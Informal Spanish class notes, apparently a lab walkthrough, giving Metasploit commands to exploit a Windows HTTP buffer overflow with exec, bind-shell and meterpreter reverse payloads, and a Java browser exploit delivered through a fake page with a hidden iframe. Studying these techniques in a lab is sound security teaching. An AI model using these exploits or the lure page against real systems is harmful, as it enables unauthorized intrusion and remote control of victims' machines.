Prueba Para entar.... msfconsole
Enviado por dacelorio • 7 de Junio de 2017 • Apuntes • 841 Palabras (4 Páginas) • 297 Visitas
Para entar....
msfconsole
Para ver los comando...
help
--Ingresar al modulo
use exploit/windows/http/efes_fmws_userid_bof
---
info (nos da la informacion del modulo quw haigamos cargado)
---
show options
nos muestra las opciones basicas del modulo
--
set RHOST 192.168.0.32
maquina que se va analizar
--
set PAYLOAD windows/
existen cientos de posibildades de payload para windows
en este caso 128 posibilidades.
set PAYLOAD windows/exec
---
damos otra vez
show options
nos mostrara las opciones del modulo y por otro lado las opcioes de ld PAYLOAD
----
DONDE YA PODEMOS EJECUTAR CODIO REMOTO
set CMD calc.exe (enter)
exploit (enter) y se ejecuta la calculadora en la pc remota
---
nos cambiamos a
set PAYLOAD windows/shell_bind_tcp (enter)
show options (enter)
exploit (enter) Notaremos que nos aparece un CDM
whoami
en modulo shell_bing_tcp lo que hara es atarse al puerto 4444
(Capturar pantalla de windows de windows ejecutando netstat -rn)
--
Segunda clase de vulneravilidades: (CLIENT-SIDE)
Existe un modulo
use exploit/windows/http_/efs_userid_bof (enter)
show options (enter)
Siempre que apares en parametro RHOST significa que es una analisis directa
o instruccion directa
set RHOST 192.168.1.X (enter)
set PAYLOAD windows/meterpreter/reverse_tcp (enter)
(significa se lo hace dedes la KALI misma)
set LHOST 192.168.1.x (enter)
show options (enter)
--
Sin embargo en ves de reverso lo ponemos de tipo bind
set PAYLOAD windows/meterpreter/bind_tcp (enter)
show options (enter)
(sera in instruccion directa por en la maquina win estara el PAYLOAD ESPERNADONOS)
exploit (ENTER)
getuid (enter) nos mostara que estamos en la maquia de windows 7
exit (salimos)
---
VAMOS A EXPLOTAR JAVA
use exploit /multi/browser/java_jre17_jmxbean (enter)
(no es explotacion dierecta, nosotros recibiremso uan peticion
le devolveremos un exploit)
hay que tener creada uan pagina
<html>
<body>
esto no es facebook.com
<iframe src="http://192.168.1.15:8080/" height="0" width="0">
</body>
</html>
---
activamos apache---
/etc/init.d/apache2 start
ejecutamos http://192.168.1.18:8080/ ne windows 7
--
en el kali
show options
set URIPATH
show options
como esto es un expliot de java, multiplataforma
show targets ( mostramnos los targets)
set payload java/ (son payload JAVA para linux)
--Por default esta target 0 que es par linux
cambiamos a payload para windows
set TARGET 1 (enter)
--metenemos el PAYLOAD que querramos
set PAYLOAD windows/meterpreter/reserve_tcp (enter)
set LHOST 192.168.1.15 (ENTER)
exploit (enter)
no pasara nada hasta que lancemos la pagina desde windows
y comenzara la peticion
y des kali ya tendriamos acceso, pero fue por el usuario uso la pagina
y podmos ver la session
sessions (enter)
getuid (enter)
sysinfo (enter)
----------------------------------------------------------------------------
OTRO EJEMPLO DE CLIENT SIDE pero esto es con Firefox mozilla
http://www.seguridadapple.com/2015/03/poc-proxy-prototype-privileged.html
-------------------------------------------------------------------------
...